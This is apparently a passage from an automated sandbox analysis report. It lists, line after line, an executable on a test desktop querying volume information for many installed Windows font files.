Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
